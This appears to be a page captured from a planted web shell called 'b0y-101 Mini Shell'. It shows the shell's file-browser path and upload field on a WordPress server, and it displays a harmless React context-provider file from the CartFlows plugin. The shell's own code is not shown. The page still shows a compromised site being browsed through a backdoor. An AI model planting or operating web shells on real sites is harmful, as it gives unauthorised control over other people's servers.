b0y-101 Mini Shell


Current Path : E:/www/km/wp2/wp-content/plugins/cartflows/wizard/assets/src/utils/SettingsProvider/
File Upload :
Current File : E:/www/km/wp2/wp-content/plugins/cartflows/wizard/assets/src/utils/SettingsProvider/index.js

import React, { createContext, useContext, useReducer } from 'react';

// Prepare a dataLayer
export const StateContext = createContext();

// Wrap our app and provide the Data layer
export const SettingsProvider = ( { reducer, initialState, children } ) => (
	<StateContext.Provider value={ useReducer( reducer, initialState ) }>
		{ children }
	</StateContext.Provider>
);

// Get information from the data layer
export const useSettingsValue = () => useContext( StateContext );

Copyright © 2019 by b0y-101